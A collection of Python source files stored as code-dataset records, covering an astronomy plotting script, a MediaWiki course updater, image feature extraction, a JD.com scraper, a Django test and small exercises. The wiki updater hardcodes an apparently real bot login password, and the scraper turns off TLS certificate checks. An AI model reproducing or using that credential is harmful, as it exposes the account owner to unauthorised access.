IS A TEST BOT')\n\n try:\n with open(token_file, 'r') as f:\n token = f.read()\n if not token:\n raise RuntimeError\n except (OSError, RuntimeError):\n raise RuntimeError(f'No token file or contents found: {token_file}')\n\n bot.run(token)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"636981780","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 8 00:04:06 2016\n\n@author: seven\n\"\"\"\n\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nfrom scipy import integrate\n\no=fits.open('/home/seven/Downloads/O7Ia.fits')\nb=fits.open('/home/seven/Downloads/B5V.fits')\na=fits.open('/home/seven/Downloads/A2Vs.fits')\nf=fits.open('/home/seven/Downloads/F8V.fits')\ng=fits.open('/home/seven/Downloads/G5VCH0.3.fits')\nk=fits.open('/home/seven/Downloads/K1V.fits')\nm=fits.open('/home/seven/Downloads/M0V.fits')\n\nmass_min=0.08 #unit: mass of the Sun\nmass_max=80\nnum=[]\n\ndef IMF(x):\n return x**(-2.35) #from wiki initial mass function\n\nNUM=integrate.quad(IMF, 0.08, 80)[0]\nnum.append(integrate.quad(IMF, 16, 80)[0]/NUM) #from wiki stellar classification\nnum.append(integrate.quad(IMF, 2.1, 16)[0]/NUM)\nnum.append(integrate.quad(IMF, 1.4, 2.1)[0]/NUM)\nnum.append(integrate.quad(IMF, 1.04, 1.4)[0]/NUM)\nnum.append(integrate.quad(IMF, 0.8, 1.04)[0]/NUM)\nnum.append(integrate.quad(IMF, 0.45, 0.8)[0]/NUM)\nnum.append(integrate.quad(IMF, 0.08, 0.45)[0]/NUM)\n\n\nU=[3.8,3.65,5.07,7.22,7.370,8.95,11.187]\nB=[4.8,4.20,4.95,7.27,7.050,8.59,9.892]\nV=[4.95,4.36,4.80,6.75,6.360,7.80,8.470]\nd=[1.71,5.45,20.21,28.9,42.12,42.76,94.60]\nmass=[48,9,1.8,1.22,0.92,0.62,0.27]# mean age, i.e. 48=(16+80)/2\nlife=[]\nfor i in range (7):\n if mass[i]<1:\n life.append((1/mass[i])**2)#stellar age, unit: Gyr\n else:\n life.append((1/mass[i])**3)\n \n \nu_g=[]\ng_r=[]\n\nfor k in range(7):\n LU=0\n LB=0\n LV=0\n for j in range(7-k):\n i=j+k\n LU=LU+10**(-U[i]*0.4)*num[i]*(1000/d[i])**2#flux = SUM(10^(-m/2.5)*number_of_star/distance^2) --> same distance\n LV=LV+10**(-V[i]*0.4)*num[i]*(1000/d[i])**2\n LB=LB+10**(-B[i]*0.4)*num[i]*(1000/d[i])**2\n\n mU=-2.5*math.log10(LU)+5 #magnitude=-2.5log10(flux)\n mV=-2.5*math.log10(LV)+5\n mB=-2.5*math.log10(LB)+5\n\n\n if mU-mB<0:\n u_g.append(1.28*(mU-mB) + 1.14) #http://classic.sdss.org/dr4/algorithms/sdssUBVRITransform.html\n g_r.append(1.09*(mB-mV) - 0.23)\n else:\n u_g.append(1.28*(mU-mB) + 1.13)\n g_r.append(1.02*(mB-mV) - 0.22)\n\nplt.semilogx(life,u_g,'r+-',label='u-g') \nplt.semilogx(life,g_r,'b^-',label='g-r') \nplt.legend(loc='upper left')\nplt.xlabel('Age/Gyr')\nplt.ylabel('color')\nplt.title('color evolution diagram')\nplt.show()","sub_path":"eric/homework2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117195145","text":"#!/bin/python3\n\nimport csv\nimport sys\nimport json\n\nfrom simplemediawiki import MediaWiki\n\ndef pretty_print(data):\n print(json.dumps(data, indent=2, separators=(',', ': ')))\n\nteachers = {\n 'DURET-LUTZ.Alexandre': '[[User:Adl]]',\n 'RICOU.Olivier': '[[User:Ricou]]',\n 'GERAUD.Thierry': '[[User:Theo]]',\n 'LEVILLAIN.Roland': '[[User:Roland]]',\n 'DEHAK.Reda': '[[User:Reda]]',\n 'DEMAILLE.Akim': '[[User:Akim]]',\n 'VERNA.Didier': '[[User:Didier]]',\n 'FABRIZZIO.Johnatan': '[[User:Jonathan]]',\n 'DEMOULINS.Clément': '[[User:Cd]]'\n}\n\naudiences = {\n '': 'InfoSub',\n '': 'InfoSpé',\n '': 'Tronc-commun',\n '': 'Majeure',\n '': 'Apprentis',\n '': 'Cycle Ing',\n '': 'CSI',\n '': 'SCIA'\n}\n\nlabels = {\n 'intitule': 'title',\n 'code': 'acronym',\n 'enseignant-officiel': 'teacher',\n 'annee': 'period',\n 'orientation': 'audience',\n}\n\ndef process(wiki, csvfile):\n reader = csv.reader(csvfile, delimiter=';', quotechar='|')\n for row in reader:\n if reader.line_num == 1:\n fields = row\n continue\n items = zip(fields, row)\n course = \"{{Course\\n\"\n data = {}\n for (name, value) in items:\n name = name.lower()\n value = value.strip()\n if name in labels:\n name = labels[name]\n data[name] = value\n if name == 'teacher':\n course += \"| {} = {}\\n\".format(name, teachers[value])\n else:\n course += \"| {} = {}\\n\".format(name, value)\n course += \"}}\\n\"\n print(course)\n #title = \"{} ({})\".format(data['intitule'], data['code'])\n #title = title.replace('[', '').replace(']', '')\n #pretty_print(wiki.update_page(title=title, content=course))\n\ndef main():\n wiki = MediaWiki('https://www.lrde.epita.fr/api.php')\n wiki.login('Bot', 'raiQuaef4hooyu7eoZ6t', 'local')\n print(\"# Connected to %s\" % wiki.call2(action='query', meta='siteinfo')['query']['general']['sitename'])\n\n for arg in sys.argv[1:]:\n with open(arg) as csvfile:\n process(wiki, csvfile)\n sys.exit()\n\n wiki.logout()\n\nif __name__ == '__main__':\n main()\n","sub_path":".dotfiles/bin/update_courses.py","file_name":"update_courses.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"442078631","text":"\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nfrom skimage.feature import hog\nfrom image_processing import *\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True):\n # Call with two outputs if vis==True\n if vis == True:\n features, hog_image = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n # Otherwise call with one output\n else: \n features = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features\n\ndef bin_spatial(img, size=(32, 32)):\n return cv2.resize(img, size).ravel()\n \ndef color_hist(img, nbins=32): #bins_range=(0, 256)\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\n\ndef extract_features(path, file_type=\"jpg\", color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True, vis=False):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file_path in path:\n img = read_image(file_path, file_type)\n \n features.append(single_img_features(img, color_space=color_space, \n spatial_size=spatial_size,\n hist_bins=hist_bins, orient=orient, \n pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, \n spatial_feat=spatial_feat, \n hist_feat=hist_feat, \n hog_feat=hog_feat, vis=vis))\n # Return list of feature vectors\n return features\n\n\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True,\n vis=False): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True))\n hog_features = np.concatenate(hog_features)\n else:\n if vis == True:\n hog_features, hog_image = get_hog_features(feature_image[:,:,hog_channel], orient,\n pix_per_cell, cell_per_block, vis=vis, feature_vec=True)\n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n #8) Append features to list\n img_features.append(hog_features)\n \n if vis == True:\n #9) Return concatenated array of features and hog image\n return np.concatenate(img_features), hog_image\n else:\n return np.concatenate(img_features)\n\ndef feature_subsample(img, ystart, ystop, scale, svc, X_scaler, orient,\n pix_per_cell, cell_per_block, spatial_size, hist_bins):\n draw_img = np.copy(img)\n #img = img.astype(np.float32)/255\n heat = np.zeros_like(img[:,:,0]).astype(np.float)\n \n img_tosearch = img[ystart:ystop,:,:]\n ctrans_tosearch = rgb_to_colorspace(img_tosearch, color_space='YCrCb')\n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n \n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n\n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell)-1\n nyblocks = (ch1.shape[0] // pix_per_cell)-1 \n nfeat_per_block = orient*cell_per_block**2\n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n window = 64\n nblocks_per_window = (window // pix_per_cell)-1 \n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n \n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n \n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n # Where are we in pixel space for this particular cell\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64,64))\n \n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \n test_prediction = svc.predict(test_features)\n \n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n win_draw = np.int(window*scale)\n cv2.rectangle(draw_img,(xbox_left, ytop_draw+ystart),(xbox_left+win_draw,ytop_draw+win_draw+ystart),(0,0,255),6) \n heat[ytop_draw+ystart:ytop_draw+win_draw+ystart, xbox_left:xbox_left+win_draw] += 1\n return draw_img, heat\n\ndef scale_training_features(features):\n #features = np.array(features).astype(np.float64)\n scaler = StandardScaler()\n scaler.fit(features)\n features = scaler.transform(features)\n return features, scaler\n\nif __name__ == \"__main__\":\n pass","sub_path":"extract_feature.py","file_name":"extract_feature.py","file_ext":"py","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"49318135","text":"import psutil\nimport logging\nimport sys\n\n\ndef file_is_free(fpath):\n # if any process has file handle opened for this file, than it is not free\n for proc in psutil.process_iter():\n try:\n for item in proc.open_files():\n if fpath == item.path:\n return False\n except Exception:\n pass\n\n return True\n\n\ndef get_logger(name, prefix):\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter(prefix + ': %(asctime)s\\t%(levelname)s\\t%(message)s')\n ch = logging.StreamHandler(stream=sys.stdout)\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n return logger\n","sub_path":"nginx/src/ekirill/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"637112155","text":"limit = int(input('Podaj limit predkosci: '))\npred = int(input('Podaj predkosc pojazdu: '))\nroznica = pred - limit\ncounter = -10\nif roznica <= 0:\n print('Bez mandatu')\nelif roznica > 0 and roznica <= 10:\n print(f'Mandat: {roznica*5}')\nelif roznica > 10:\n for i in range(roznica):\n counter += 1\n print(f'Mandat: {50+counter*15}')","sub_path":"02-ControlStructures/44.py","file_name":"44.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"390174992","text":"# https://leetcode.com/problems/defanging-an-ip-address/\ndef defangIPaddr(address):\n defanged = str()\n for i in address:\n try:\n ip_int = int(i)\n defanged = defanged + str(ip_int)\n except:\n defanged = defanged + '[' + i + ']'\n return defanged\n\n\nprint(defangIPaddr(\"1.1.1.1\"))\nprint(defangIPaddr(\"255.100.50.0\"))\n","sub_path":"defang_ipaddress.py","file_name":"defang_ipaddress.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"352684023","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom django.core import urlresolvers\nfrom django import http\nimport mox\n\nfrom tuskar_ui import api as tuskar\nfrom tuskar_ui.test import helpers as test\n\n\nclass FlavorsTests(test.BaseAdminViewTests):\n\n @test.create_stubs({tuskar.Flavor: ('get',),\n tuskar.ResourceClass: ('get',)})\n def test_detail_flavor(self):\n flavor = self.tuskar_flavors.first()\n resource_class = self.tuskar_resource_classes.first()\n\n tuskar.ResourceClass.get(mox.IsA(http.HttpRequest),\n resource_class.id).AndReturn(resource_class)\n\n tuskar.Flavor.get(mox.IsA(http.HttpRequest),\n resource_class.id,\n flavor.id).AndReturn(flavor)\n\n self.mox.ReplayAll()\n\n url = urlresolvers.reverse('horizon:infrastructure:'\n 'resource_management:resource_classes:'\n 'flavors:detail',\n args=[resource_class.id, flavor.id])\n res = self.client.get(url)\n self.assertTemplateUsed(res,\n 'infrastructure/resource_management/'\n 'flavors/detail.html')\n\n @test.create_stubs({tuskar.Flavor: ('get',)})\n def test_detail_flavor_exception(self):\n flavor = self.tuskar_flavors.first()\n resource_class = self.tuskar_resource_classes.first()\n\n tuskar.Flavor.get(mox.IsA(http.HttpRequest),\n resource_class.id,\n flavor.id).AndRaise(self.exceptions.tuskar)\n\n self.mox.ReplayAll()\n\n url = urlresolvers.reverse('horizon:infrastructure:'\n 'resource_management:resource_classes:'\n 'flavors:detail',\n args=[resource_class.id, flavor.id])\n res = self.client.get(url)\n\n self.assertRedirectsNoFollow(res,\n urlresolvers.reverse('horizon:infrastructure:resource_management:'\n 'index'))\n","sub_path":"tuskar_ui/infrastructure/resource_management/flavors/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"602308226","text":"# -*- coding: utf-8 -*- \n# 找出一组字符串中最长的公共前缀: 先找出字符串中最小的字符串,然后把最小字符串中的字幕依次和剩余字符串进行比较。\n\n\ndef longestCommonPrefix(strs):\n if not strs:\n return ''\n \n first = min(strs)\n \n for i in range(len(first)):\n for s in strs:\n if first[i]!=s[i]:\n return first[:i]\n \n return first\n\n\nprint (longestCommonPrefix(['abc','ab','a']))","sub_path":"workspace/新建文件夹/Leetcode/review/最长公共前缀.py","file_name":"最长公共前缀.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"598845999","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\nrequests.packages.urllib3.disable_warnings()\nsession=requests.Session()\nsession.proxies={\n 'https':'http://125.70.13.77:8080',\n 'http':'http://125.70.13.77:8080'\n}\n\nurl='https://search.jd.com/Search?keyword=%E7%A9%BA%E6%B0%94%E5%87%80%E5%8C%96%E5%99%A8&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=kong%27qi%27jing%27hua%27qi&psort=3&stock=1&page=121&s=61&click=0'\n#商品界面url=1+2n\ndef get_goods_list_url(page):\n return 'https://search.jd.com/Search?keyword=%E7%A9%BA%E6%B0%94%E5%87%80%E5%8C%96%E5%99%A8&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=kong%27qi%27jing%27hua%27qi&psort=3&stock=1&page={}&s=61&click=0'.format(page)\n\n#评论url,source范围0--7\ndef get_comment_url(goods_id,source,page):\n return 'https://sclub.jd.com/comment/productPageComments.action?callback=fetchJSON_comment98vv40121&productId={}&score={}&sortType=6&page={}&pageSize=10&isShadowSku=0&fold=1'.format(goods_id,source,page)\n\ndef get_goods_list_data(url):\n res = requests.get(url)\n res.encoding = 'utf-8'\n # print(res.text)\n soup = BeautifulSoup(res.text, 'lxml')\n goods_ul = soup.select('ul.gl-warp.clearfix')[0]\n for li in goods_ul.find_all('li'):\n id = li['data-sku']\n print('ID--------' + id)\n title = li.select('div.p-name.p-name-type-2 em')[0].text\n print('标题------' + title)\n price = li.select('div.p-price strong i')[0].text\n print('价格------' + price)\n comment_num = li.select('div.p-commit a[id^=J_comment]')[0].text\n print(\"评价------\" + comment_num)\n shop_name = li.select('div.p-shop a')[0].text\n print(\"店铺名----\" + shop_name)\n print('开始获取该商品评论.....')\n get_all_comments(id)\n print('评论抓取完成')\n # break\n\n#获取评论----一个url\ndef get_comments(url):\n comment_res=requests.get(url,verify=False)\n # comment_res.encoding='utf-8'\n comments_json=json.loads(comment_res.text[27:-2])['comments']\n if comments_json==[]:\n raise OverflowError\n return None\n # print(json.dumps(j,indent=4,separators=(',',':')))\n for comment in comments_json:\n print(comment['content'])\n\n#获取所有评论---遍历url\ndef get_all_comments(goods_id):\n for source in range(8):\n page = 0\n while True:\n try:\n get_comments(get_comment_url(goods_id,source, page))\n page += 1\n except OverflowError:\n break\n\n# get_all_comments(5487565)\n\nif __name__ == '__main__':\n for i in range(50):\n page=1+2*i\n get_goods_list_data(get_goods_list_url(page))\n break","sub_path":"myspiders/tidy/jd_data.py","file_name":"jd_data.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"90133552","text":"#!/usr/bin/env python3\nimport cgi\nimport pandas as pd\nimport ujson\nfrom articlix.search.search import Articlix\nfrom articlix.index.index import correct, get_tokens\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nimport urllib\nimport numpy as np\n\ndef get_tokens_(text, spellcheck):\n tokens = RegexpTokenizer(r'\\w+').tokenize(text)\n if spellcheck:\n tokens = [correct(token) for token in tokens]\n return tokens\n\n\nclass Interface:\n def __init__(self): \n print(\"Reading data ...\")\n df = pd.read_hdf('data/clean_articles2.h5')\n ix = ujson.load(open('data/index2.json', 'r'))\n self.ss = Articlix(df, ix, spellcheck=False)\n\n def check_query(self, q):\n inform_str = b''\n q_tokens = get_tokens_(q, False)\n correct_tokens = get_tokens_(q, True)\n need_to_inform = False\n for token, word, correct_token in zip(q_tokens, q.split(' '), correct_tokens):\n if token != correct_token:\n inform_str += b'<b>' + correct_token.encode('utf8') + b'</b> '\n need_to_inform = True\n else:\n inform_str += token.encode('utf8') + b' '\n return ' '.join(correct_tokens), inform_str\n\n def get_checked_query(self, arguments):\n if 'query' not in arguments:\n return b''\n corrected_query, cor_q_str = self.check_query(arguments['query'].value)\n topn = int(arguments['topn'].value)\n order = arguments['sort_by'].value\n query = arguments['query'].value\n import copy \n new_args = copy.deepcopy(arguments)\n is_better = list(self.ss.find(query, topn=topn, order=order, add_scores=True)['scores'])[0] < list(self.ss.find(corrected_query, topn=topn, order=order, add_scores=True)['scores'])[0]\n if is_better:\n s = b'Do you mean: '\n new_args['query'].value = ' '.join(get_tokens_(new_args['query'].value, True))\n s += b'<a href=\"http://127.0.0.1:8080/?' + urllib.parse.urlencode({key: new_args[key].value for key in new_args}).encode(\"utf8\") + b'\">' + cor_q_str + b'</a>'\n s += b'?<br><br>'\n return s\n return b''\n\n def get_top_html(self, arguments):\n if 'query' in arguments:\n query = arguments['query'].value\n else:\n query = ''\n if 'priority' in arguments:\n prior = arguments['priority'].value\n else:\n prior = ''\n order = 'scores'\n if 'sort_by' in arguments:\n order = arguments['sort_by'].value\n topn = 5\n if 'topn' in arguments:\n topn = arguments['topn'].value\n return b'''\n <html>\n <head>\n <title>Hello Articlix!\n \n \n

Articlix

\n
\n \n
\n \n
\n
\n \n
\n \n
\n
\n
\n\n \n
\n
\n \n \n \n
\n
\n


\n '''\n def get_start_top_html(self, query=None, prior=None):\n return b'''\n \n \n Hello Articlix!\n \n \n

Articlix

\n \n \n
\n \n
\n \n '''\n\n def get_bottom_html(self):\n return b'''\n
\n \n \n '''\n\n def refresh(self, environ, start_response):\n html = self.get_start_top_html() + self.get_bottom_html()\n\n arguments = cgi.FieldStorage(environ=environ)\n if len(arguments) > 0:\n html = self.get_top_html(arguments) + self.get_checked_query(arguments) + self.get_response_html(arguments) + self.get_bottom_html()\n\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [html]\n\n def get_response_html(self, arguments):\n query = ''\n prior = ''\n if 'query' in arguments:\n query = arguments['query'].value\n if 'priority' in arguments:\n prior = arguments['priority'].value\n\n if query == '' or prior == '':\n return self.get_response_to_empty(query == '', prior == '')\n self.ss.priors = prior\n html = b''\n result_list = []\n order = 'scores'\n if 'sort_by' in arguments:\n order = arguments['sort_by'].value\n topn = 5\n if 'topn' in arguments:\n topn = int(arguments['topn'].value)\n return self.create_table(query, self.ss.find(query, topn=topn, order=order))\n\n def get_article(self, q, doc_id, url, title, content):\n s = b'' + self.highlight_words(q, title, doc_id, is_title=True) + b''\n s += b''\n s += self.highlight_words(q, content, doc_id, False, get_description=True, window_size=200)\n return s\n\n def create_table(self, q, pd_table):\n s = b''\n s += b''\n for doc_id, row in pd_table.iterrows():\n s += b''\n s += b''\n s += b''\n s += b''\n s += b''\n s += b''\n s += b''\n s += b'
ResultsPublished dateEstimated time to readNumber of likesNumber of comments
' + self.get_article(q, doc_id, row['url'], row['title'], row['content']) + b'' + str(pd.to_datetime(row['published_date']).date()).encode('utf8') + b'' + str(row['estimate_time']).encode('utf8') + b'' + str(row['likes']).encode('utf8') + b'' + str(row['comments']).encode('utf8') + b'
'\n return s\n\n \n def get_response_to_empty(self, query_is_empty, prior_is_empty):\n s = b''\n if query_is_empty:\n s += b'Please fill query.
'\n if prior_is_empty:\n s += b'Please fill info about yourself.
'\n return s\n \n def highlight_words(self, query, text, doc_id, is_title, get_description=False, window_size=None):\n positions = []\n for i, q in get_tokens(query, False):\n for d, pos, is_t in self.ss.index.get(q, []):\n if d == doc_id and is_title == is_t:\n positions.append(pos)\n positions = np.array(positions) \n if len(positions) == 0:\n if get_description and window_size is not None:\n return text[:window_size].encode('utf8') + b'
'\n return text.encode('utf8') + b'
'\n\n if not get_description or window_size is None:\n window_size = len(text)\n i_from = 0\n else:\n window_size = min(window_size, len(text))\n i_from = positions[0]\n count = ((i_from < positions) & (positions < i_from + window_size)).sum()\n for i in positions:\n if i + window_size >= len(text):\n break\n c = ((i <= positions) & (positions < i + window_size)).sum()\n if count < c:\n count = c\n i_from = i\n s = b'...'\n i = i_from\n while i < i_from + window_size and i < len(text):\n if i not in positions:\n s += text[i].encode('utf8')\n i += 1\n else:\n s += b''\n while i < i_from + window_size and i < len(text) and text[i].isalpha():\n s += text[i].encode('utf8')\n i += 1\n s += b''\n s += b'
'\n return s\n\n def run(self):\n try:\n from wsgiref.simple_server import make_server\n httpd = make_server('', 8080, self.refresh)\n print('Serving on http://127.0.0.1:8080...')\n httpd.serve_forever()\n except KeyboardInterrupt:\n print('Goodbye.')\n\n\n","sub_path":"articlix/web_interface/web_interface.py","file_name":"web_interface.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"400096972","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:bowen jiang\n\"\"\"\nimport requests\nimport pytest\n\nclass Test_presalePage_edit:\n \"\"\"\n 编辑售前页\n \"\"\"\n\n def test_presalePage_edit_success(self, Http_cl, data,new_presalePage):\n \"\"\"\n desc:编辑售前页成功\n steps:\n 1、创建新售前页\n 2、调编辑售前页接口成功\n 3、验证返回的状态码为200和返回参数正确\n \"\"\"\n presaleId = new_presalePage\n res = Http_cl.presalePage_edit(data.needCallback, data.addTeacherProcess, data.title,data.couponRef,\n data.firstLevelTitle, data.secondLevelTitle, data.adFeedType, data.headPicture,\n data.briefIntroPic1, data.briefIntroPic2, data.briefIntroPic3, data.briefIntroPic4,\n data.promotionText,data.promotionUnit, data.originalPrice, data.couponTitle,\n data.notBoughtText, data.boughtText, data.canNotBuyText,data.isDeleted,\n data.campRef, data.channel,presaleId=str(presaleId))\n assert res.data.id == presaleId\n\n","sub_path":"auto_api_project/xmkp-api-test/cases/OPS/LMS/trainingcamp/PresalePage/test_cases/test_presalePage_edit.py","file_name":"test_presalePage_edit.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"214279130","text":"class Nodo:\n def __init__(self, value, siguiente = None):\n self.data = value #Falta encapsulamiento\n self.siguiente = siguiente\n\nclass LinkedList:\n def __init__(self):\n self.__head = None\n\n def is_empty(self):\n return self.__head == None\n\n def append(self, value):\n nuevo = Nodo( value )\n if self.__head == None:\n self.__head = nuevo # self.is_empty()\n else:\n curr_node = self.__head\n while curr_node.siguiente != None:\n curr_node = curr_node.siguiente\n curr_node.siguiente = nuevo\n\n def transversal(self):\n curr_node = self.__head\n while curr_node != None:\n print(f\"{curr_node.data} -->\", end = \"\")\n curr_node = curr_node.siguiente\n print(\" \")\n\n def remove(self, value):\n curr_node = self.__head\n if self.__head.data == value:\n self.__head = self.__head.siguiente\n else:\n anterior = None\n while curr_node.data != value and curr_node.siguiente != None:\n anterior = curr_node\n curr_node = curr_node.siguiente\n if curr_node.data == value:\n #print(\"ACTUAL:\", anterior.data)\n anterior.siguiente = curr_node.siguiente\n else:\n print(\"El dato no existe en la lista\")\n\n def preppend(self, value):\n nuevo = Nodo(value, self.__head)\n self.__head = nuevo\n\n def tail(self):\n curr_node = self.__head\n while curr_node.siguiente != None:\n curr_node = curr_node.siguiente\n return curr_node\n\n def get(self, posicion = None): #Por defecto regresa el ultimo\n contador = 0\n dato = None\n if posicion == None:\n dato = self.tail().data\n else:\n #TAREA 6 --------------------------------------------------------------------------\n curr_node = self.__head\n while contador != posicion and curr_node.siguiente != None:\n curr_node = curr_node.siguiente\n contador = contador + 1\n if contador == posicion: # Buscaremos por que se detubo el while.\n dato = curr_node.data\n else:\n dato = \"Rango fuera de la lista\"\n #TAREA 6 --------------------------------------------------------------------------\n return dato\n","sub_path":"Tarea 